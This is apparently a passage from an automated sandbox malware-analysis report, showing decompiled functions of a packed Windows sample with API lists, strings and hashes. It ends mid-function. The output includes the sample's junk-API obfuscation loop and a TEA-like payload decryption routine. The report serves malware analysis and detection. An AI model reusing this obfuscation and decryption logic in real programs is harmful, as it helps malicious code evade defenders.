                    • Instruction ID: abda904b53807bb75eb126b1944003bcfc5e7a389ebb07586c1cf06103884214
                    • Opcode Fuzzy Hash: c968fc26dad764d8bb3b27da463ee2b1ac94b68773e3d7493b1255c70e2866d0
                    • Instruction Fuzzy Hash: 2521CFB8801284DFD710DF65EA856443BF4BB09314B10807AE50DA77B2E7B865C98F5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040C27F Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040C27F() {

				SetUnhandledExceptionFilter(E0040C23D);
				return 0;
			}



                    0x0040c284
                    0x0040c28c

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000C23D), ref: 0040C284
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: e8adb6c1ff60520eeb7d63791d4aa3345d15e8c7c95c6ad18d95786b905b9a10
                    • Instruction ID: 54c73ad5e31d9162a6a2fc8e45ef39e692352da58bd788bd34167f22968144bd
                    • Opcode Fuzzy Hash: e8adb6c1ff60520eeb7d63791d4aa3345d15e8c7c95c6ad18d95786b905b9a10
                    • Instruction Fuzzy Hash: C390026066114186C60417B05E4A64625915A59702B5146B96581E4CA4EA744040655A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405800 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 110memorylibrarytimeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 60%
                    			E00405800() {
				intOrPtr _v8;
				unsigned int _v12;
				long _v16;
				char _v20;
				long _v24;
				char _v572;
				char _v1596;
				char _v2620;
				char _v3644;
				char _v5692;
				unsigned int _t18;
				unsigned int _t19;
				intOrPtr* _t36;
				intOrPtr _t37;
				intOrPtr* _t44;

				E00413F00(0x163c);
				_t18 =  *0x47f7d4; // 0x5f7d0
				_t37 =  *0x47f73c; // 0x0
				_t19 = _t18 >> 3;
				if(_t19 > 0) {
					_t44 = __imp__SetFileValidData;
					_t36 = __imp__DnsHostnameToComputerNameW;
					_v8 = _t37;
					_v12 = _t19;
					do {
						_t47 =  *0x47f7d4 - 0x5d;
						if( *0x47f7d4 == 0x5d) {
							GlobalGetAtomNameA(0,  &_v1596, 0);
							 *_t44(0, 0, 0);
							 *_t36(0,  &_v5692,  &_v20);
							WriteConsoleW(0, 0, 0,  &_v24, 0);
							__imp__GetConsoleAliasA(0,  &_v3644, 0, 0);
							LCMapStringA(0, 0, "tegegefisisarehajabi", 0,  &_v2620, 0);
							VirtualProtect(0, 0, 0, 0);
							LoadLibraryW(L"yafomumodiyohazeminuxuzupijuhizinixovosumib");
							__imp__EnumCalendarInfoExA(0, 0, 0, 0);
							WriteConsoleA(0, 0, 0,  &_v16, 0);
							__imp__GetConsoleAliasExesLengthA();
							IsBadHugeReadPtr(0, 0);
							__imp__GetCPInfoExW(0, 0,  &_v572);
							SetCommTimeouts(0, 0);
							IsBadStringPtrW(L"tofafulatayobejazumuvulevijufixirosurupuz", 0);
							FindResourceExW(0, L"mayuziwabasorukayazezepokotinifexuxodiruxiluyopetidoka", L"humar", 0);
							EnumResourceTypesA(0, 0, 0);
						}
						_t19 = E00405630(_t47, _v8);
						_v8 = _v8 + 8;
						_t14 =  &_v12;
						 *_t14 = _v12 - 1;
					} while ( *_t14 != 0);
				}
				return _t19;
			}


















                    0x00405808
                    0x0040580d
                    0x00405812
                    0x00405819
                    0x00405820
                    0x0040582c
                    0x00405832
                    0x00405838
                    0x0040583b
                    0x0040583e
                    0x0040583e
                    0x00405845
                    0x00405856
                    0x0040585e
                    0x0040586d
                    0x0040587b
                    0x0040588e
                    0x004058a8
                    0x004058b6
                    0x004058c1
                    0x004058cf
                    0x004058e1
                    0x004058e7
                    0x004058f1
                    0x00405902
                    0x0040590c
                    0x00405919
                    0x0040592d
                    0x00405939
                    0x00405939
                    0x00405943
                    0x00405948
                    0x0040594c
                    0x0040594c
                    0x0040594c
                    0x0040583e
                    0x0040595c

                    APIs
                    • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00405856
                    • SetFileValidData.KERNEL32(00000000,00000000,00000000), ref: 0040585E
                    • DnsHostnameToComputerNameW.KERNEL32 ref: 0040586D
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040587B
                    • GetConsoleAliasA.KERNEL32(00000000,?,00000000,00000000), ref: 0040588E
                    • LCMapStringA.KERNEL32(00000000,00000000,tegegefisisarehajabi,00000000,?,00000000), ref: 004058A8
                    • VirtualProtect.KERNEL32(00000000,00000000,00000000,00000000), ref: 004058B6
                    • LoadLibraryW.KERNEL32(yafomumodiyohazeminuxuzupijuhizinixovosumib), ref: 004058C1
                    • EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004058CF
                    • WriteConsoleA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058E1
                    • GetConsoleAliasExesLengthA.KERNEL32 ref: 004058E7
                    • IsBadHugeReadPtr.KERNEL32 ref: 004058F1
                    • GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 00405902
                    • SetCommTimeouts.KERNEL32(00000000,00000000), ref: 0040590C
                    • IsBadStringPtrW.KERNEL32 ref: 00405919
                    • FindResourceExW.KERNEL32(00000000,mayuziwabasorukayazezepokotinifexuxodiruxiluyopetidoka,humar,00000000), ref: 0040592D
                    • EnumResourceTypesA.KERNEL32 ref: 00405939
                    Strings
                    • tegegefisisarehajabi, xrefs: 0040589F
                    • humar, xrefs: 00405921
                    • yafomumodiyohazeminuxuzupijuhizinixovosumib, xrefs: 004058BC
                    • tofafulatayobejazumuvulevijufixirosurupuz, xrefs: 00405914
                    • mayuziwabasorukayazezepokotinifexuxodiruxiluyopetidoka, xrefs: 00405926
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: Console$AliasEnumInfoNameResourceStringWrite$AtomCalendarCommComputerDataExesFileFindGlobalHostnameHugeLengthLibraryLoadProtectReadTimeoutsTypesValidVirtual
                    • String ID: humar$mayuziwabasorukayazezepokotinifexuxodiruxiluyopetidoka$tegegefisisarehajabi$tofafulatayobejazumuvulevijufixirosurupuz$yafomumodiyohazeminuxuzupijuhizinixovosumib
                    • API String ID: 3161774360-146515975
                    • Opcode ID: 0ee4b546dd6db8f73c3634e0e59e5001217e265bf0095ff9f7d747e5e145056f
                    • Instruction ID: 92dd6cbcaf02eda086cdfc334d8d842c294cf1474bb42bb6431eef058b61f3b7
                    • Opcode Fuzzy Hash: 0ee4b546dd6db8f73c3634e0e59e5001217e265bf0095ff9f7d747e5e145056f
                    • Instruction Fuzzy Hash: 2231ED75784344BBF760AB90DE4AF9A7728EB44B02F204065F749BA5E0C6B425848F6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405630 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136filepipeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 87%
                    			E00405630(void* __eflags, unsigned int* _a4) {
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				CHAR* _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				long _v68;
				struct _INPUT_RECORD _v88;
				struct _WIN32_FIND_DATAW _v680;
				void _v1112;
				unsigned int* _t69;
				intOrPtr _t70;
				intOrPtr _t73;
				signed int _t75;
				signed int _t88;
				unsigned int* _t90;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t111;
				unsigned int _t119;
				unsigned int _t120;

				_t69 = _a4;
				_t100 =  *0x41b54c; // 0xd3ff37d4
				_t120 = _t69[1];
				_t119 =  *_t69;
				_t70 =  *0x41b548; // 0x7512338e
				_v56 = _t70;
				_v36 = _t119;
				_v20 = 0;
				_v48 = 0x9e3779b9;
				_v52 = _t100;
				E00405610( &_v20);
				_t111 =  *0x41b550; // 0xc3421911
				_t73 =  *0x41b554; // 0x2a80d8b8
				_v20 = _v20 + 0x23f;
				_v44 = _t111;
				_v60 = _t73;
				_v40 = 0x20;
				do {
					_v28 = 2;
					_v28 = _v28 + 3;
					_t101 =  *0x47f7d4; // 0x5f7d0
					_t75 = _t119 << 4;
					_v16 = _t75;
					if(_t101 == 0xc) {
						FindNextFileW(0,  &_v680);
						_t75 = _v16;
						_t101 =  *0x47f7d4; // 0x5f7d0
					}
					_v16 = _t75 + _v44;
					if(_t101 != 0xfa9) {
						if(_t101 == 0x3eb) {
							GetFileAttributesExW(L"cesufujuje", 0,  &_v1112);
							__imp__SetVolumeMountPointW(L"ditevekamodom", L"moyihikeguwuvicuwitalalel");
							 *0x47f738 = 0;
						}
					} else {
						 *0x47f7d0 = 0xedeb2e40;
					}
					_v24 = _v36;
					_v24 = _v24 + _v20;
					 *0x47f7cc = 0xf4ea3dee;
					_v12 = _t119 >> _v28;
					E00405620( &_v12, _v60);
					_v16 = _v16 ^ _v24;
					_v12 = _v12 ^ _v16;
					if( *0x47f7d4 == 0xc6e) {
						WaitNamedPipeW(0, 0);
						ReadConsoleInputA(0,  &_v88, 0,  &_v64);
						CreateEventW(0, 0, 0, L"huletisulori");
						MoveFileExA(0, 0, 0);
						InterlockedDecrement( &_v68);
					}
					_t120 = _t120 - _v12;
					_v32 = 0;
					_v32 = _v32 - 0x5396dd36;
					_v32 =  &(_v32[0x5396dd3a]);
					_v24 = _v20 + _t120;
					_v16 = (_t120 << _v32) + _v56;
					_v12 = _t120 >> _v28;
					_v12 = _v12 + _v52;
					_t88 = _v16 ^ _v12 ^ _v24;
					_t119 = _t119 - _t88;
					_v16 = _t88;
					 *0x47f594 = 0;
					_v36 = _t119;
					_v20 = _v20 - _v48;
					_t65 =  &_v40;
					 *_t65 = _v40 - 1;
				} while ( *_t65 != 0);
				_t90 = _a4;
				 *_t90 = _t119;
				_t90[1] = _t120;
				return _t90;
			}
































                    0x00405639
                    0x0040563c
                    0x00405644
                    0x00405648
                    0x0040564a
                    0x00405651
                    0x00405657
                    0x0040565a
                    0x0040565d
                    0x00405664
                    0x00405667
                    0x0040566c
                    0x00405672
                    0x00405677
                    0x0040567e
                    0x00405681
                    0x00405684
                    0x00405690
                    0x00405690
                    0x00405697
                    0x0040569b
                    0x004056a3
                    0x004056a6
                    0x004056ac
                    0x004056b6
                    0x004056bc
                    0x004056bf
                    0x004056bf
                    0x004056c8
                    0x004056d1
                    0x004056e5
                    0x004056f4
                    0x00405704
                    0x0040570a
                    0x0040570a
                    0x004056d3
                    0x004056d3
                    0x004056d3
                    0x00405713
                    0x00405719
                    0x00405726
                    0x00405730
                    0x00405736
                    0x0040573e
                    0x00405744
                    0x00405751
                    0x00405755
                    0x00405765
                    0x00405773
                    0x0040577c
                    0x00405786
                    0x00405786
                    0x0040578c
                    0x0040578f
                    0x00405792
                    0x00405799
                    0x004057af
                    0x004057b5
                    0x004057bc
                    0x004057c2
                    0x004057ce
                    0x004057d0
                    0x004057d2
                    0x004057d5
                    0x004057db
                    0x004057e1
                    0x004057e4
                    0x004057e4
                    0x004057e4
                    0x004057ee
                    0x004057f1
                    0x004057f4
                    0x004057fc

                    APIs
                    • FindNextFileW.KERNEL32(00000000,?), ref: 004056B6
                    • GetFileAttributesExW.KERNEL32(cesufujuje,00000000,?), ref: 004056F4
                    • SetVolumeMountPointW.KERNEL32(ditevekamodom,moyihikeguwuvicuwitalalel), ref: 00405704
                    • WaitNamedPipeW.KERNEL32(00000000,00000000), ref: 00405755
                    • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00405765
                    • CreateEventW.KERNEL32(00000000,00000000,00000000,huletisulori), ref: 00405773
                    • MoveFileExA.KERNEL32 ref: 0040577C
                    • InterlockedDecrement.KERNEL32(?), ref: 00405786
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: File$AttributesConsoleCreateDecrementEventFindInputInterlockedMountMoveNamedNextPipePointReadVolumeWait
                    • String ID: $cesufujuje$ditevekamodom$huletisulori$moyihikeguwuvicuwitalalel
                    • API String ID: 4004417059-1439129243
                    • Opcode ID: 54aa24edc93e98ad6bfa2e96428d9f5e4bb01055abca42d38b07a313ea44f9bd
                    • Instruction ID: 9f647ab1219f549f5f0ea101fe9e079e524831e20b4a609b2352e9af775f8545
                    • Opcode Fuzzy Hash: 54aa24edc93e98ad6bfa2e96428d9f5e4bb01055abca42d38b07a313ea44f9bd
                    • Instruction Fuzzy Hash: 685108B1D00219EFCB04DFA9D9849AEBBF9FF48314F50846AE505B7250D7349A84CF68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408A91 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E00408A91(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x418208);
				E00409480(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E0040C28D(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x402580;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x41a9a8;
				E0040E117(_t35, 1, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E00408B66();
				E0040E117(_t35, 1, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x41a998; // 0x41a8c0
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E0040FD56( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E004094C5(E00408B6F());
			}








                    0x00408a91
                    0x00408a91
                    0x00408a93
                    0x00408a98
                    0x00408a9d
                    0x00408aa3
                    0x00408aab
                    0x00408aae
                    0x00408ab3
                    0x00408ab4
                    0x00408ab7
                    0x00408aba
                    0x00408ac4
                    0x00408ac9
                    0x00408ad1
                    0x00408ad9
                    0x00408ae9
                    0x00408ae9
                    0x00408aef
                    0x00408af2
                    0x00408af9
                    0x00408b00
                    0x00408b09
                    0x00408b0f
                    0x00408b16
                    0x00408b1c
                    0x00408b23
                    0x00408b2a
                    0x00408b30
                    0x00408b33
                    0x00408b36
                    0x00408b3b
                    0x00408b3d
                    0x00408b42
                    0x00408b42
                    0x00408b48
                    0x00408b4e
                    0x00408b5f

                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00418208,0000000C,00408BCC,00000000,00000000,?,004064B6,00000000), ref: 00408AA3
                    • __crt_waiting_on_module_handle.LIBCMT ref: 00408AAE
                      • Part of subcall function 0040C28D: Sleep.KERNEL32(000003E8,00000000,?,004089F4,KERNEL32.DLL,?,00408A40,?,004064B6,00000000), ref: 0040C299
                      • Part of subcall function 0040C28D: GetModuleHandleW.KERNEL32(?,?,004089F4,KERNEL32.DLL,?,00408A40,?,004064B6,00000000), ref: 0040C2A2
                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00408AD7
                    • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00408AE7
                    • __lock.LIBCMT ref: 00408B09
                    • InterlockedIncrement.KERNEL32(0041A9A8), ref: 00408B16
                    • __lock.LIBCMT ref: 00408B2A
                    • ___addlocaleref.LIBCMT ref: 00408B48
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                    • API String ID: 1028249917-2843748187
                    • Opcode ID: c39dd4ac0b90baf1befea7c60646309bdcf6c2805d90b0d35215f05225c0d462
                    • Instruction ID: 4f95acfd8db2e8c55b01b0affb8241dd3069e1935a20304c2c73b96ecf2aa1dd
                    • Opcode Fuzzy Hash: c39dd4ac0b90baf1befea7c60646309bdcf6c2805d90b0d35215f05225c0d462
                    • Instruction Fuzzy Hash: FA118E709017019FD720AF369941B5ABBE0AF44318F10897FE4A9B62E1CB78A9408F5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B81A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 137COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E0040B81A(signed int __edx, char _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					if(_t100 != 0) {
						_t4 =  &_a4; // 0x406456
						_t82 =  *_t4;
						__eflags = _t82;
						if(_t82 == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(_a12 > _t63 / _a8) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040B6B6(_t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040A7A8(_t100));
										_t74 = E00412F17(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040BACD(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040AFE0(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E00407E97();
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E00406B09(_t90, 0, _t100);
					goto L4;
				}
			}





























                    0x0040b81a
                    0x0040b82a
                    0x0040b850
                    0x00000000
                    0x0040b831
                    0x0040b831
                    0x0040b836
                    0x0040b857
                    0x0040b857
                    0x0040b85a
                    0x0040b85c
                    0x00000000
                    0x00000000
                    0x0040b85e
                    0x0040b863
                    0x0040b866
                    0x0040b869
                    0x00000000
                    0x00000000
                    0x0040b86e
                    0x0040b872
                    0x0040b879
                    0x0040b87c
                    0x0040b87f
                    0x0040b881
                    0x0040b88b
                    0x0040b883
                    0x0040b886
                    0x0040b886
                    0x0040b892
                    0x0040b894
                    0x0040b959
                    0x00000000
                    0x0040b89a
                    0x0040b89a
                    0x0040b89d
                    0x0040b89d
                    0x0040b8a3
                    0x0040b8d4
                    0x0040b8d4
                    0x0040b8d7
                    0x0040b930
                    0x0040b937
                    0x0040b93a
                    0x0040b965
                    0x0040b965
                    0x0040b967
                    0x00000000
                    0x0040b96b
                    0x0040b93c
                    0x0040b93f
                    0x0040b942
                    0x0040b943
                    0x0040b946
                    0x0040b948
                    0x0040b94a
                    0x0040b94a
                    0x00000000
                    0x0040b948
                    0x0040b8d9
                    0x0040b8db
                    0x0040b8e8
                    0x0040b8e8
                    0x0040b8ec
                    0x0040b8ee
                    0x0040b8f2
                    0x0040b8f4
                    0x0040b8f7
                    0x0040b8f7
                    0x0040b8f7
                    0x0040b8f9
                    0x0040b8fa
                    0x0040b904
                    0x0040b905
                    0x0040b90a
                    0x0040b90d
                    0x0040b910
                    0x0040b973
                    0x0040b973
                    0x0040b977
                    0x00000000
                    0x0040b912
                    0x0040b912
                    0x0040b914
                    0x0040b916
                    0x0040b918
                    0x0040b918
                    0x0040b91a
                    0x0040b91d
                    0x0040b91f
                    0x0040b921
                    0x00000000
                    0x0040b923
                    0x0040b923
                    0x0040b923
                    0x00000000
                    0x0040b923
                    0x0040b921
                    0x0040b910
                    0x0040b8de
                    0x0040b8e4
                    0x0040b8e6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040b8e6
                    0x0040b8a5
                    0x0040b8a8
                    0x0040b8aa
                    0x00000000
                    0x00000000
                    0x0040b8ac
                    0x0040b961
                    0x0040b961
                    0x0040b961
                    0x00000000
                    0x0040b961
                    0x0040b8b2
                    0x0040b8b4
                    0x0040b8b6
                    0x0040b8b8
                    0x0040b8b8
                    0x0040b8c0
                    0x0040b8c5
                    0x0040b8c8
                    0x0040b8ca
                    0x0040b8cd
                    0x0040b8cf
                    0x00000000
                    0x0040b951
                    0x0040b951
                    0x0040b951
                    0x00000000
                    0x0040b89a
                    0x0040b894
                    0x0040b838
                    0x0040b838
                    0x0040b83d
                    0x0040b83e
                    0x0040b83f
                    0x0040b840
                    0x0040b841
                    0x0040b842
                    0x0040b848
                    0x00000000
                    0x0040b84d

                    APIs
                    • __flush.LIBCMT ref: 0040B8DE
                    • __fileno.LIBCMT ref: 0040B8FE
                    • __locking.LIBCMT ref: 0040B905
                    • __flsbuf.LIBCMT ref: 0040B930
                      • Part of subcall function 00407E97: __getptd_noexit.LIBCMT ref: 00407E97
                      • Part of subcall function 00406B09: __decode_pointer.LIBCMT ref: 00406B14
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                    • String ID: Vd@$Vd@
                    • API String ID: 3240763771-651400110
                    • Opcode ID: ce7b5e8e5fb3aa8fe84a3559882d5a7ebb0664181da7507086c62e3b69baa235
                    • Instruction ID: d9b0b9fd459113351f921aa778dd8b20b1cf5d34ba7c7a55e35930b3a3d7b7cc
                    • Opcode Fuzzy Hash: ce7b5e8e5fb3aa8fe84a3559882d5a7ebb0664181da7507086c62e3b69baa235
                    • Instruction Fuzzy Hash: B1418272A006059BDB24AF65888459FBBB9EF80360B24C53EE865B72D0D778DD419B8C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040D245 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 89%
                    			E0040D245(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_push(0x2c);
				_push(0x4183e0);
				E00409480(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
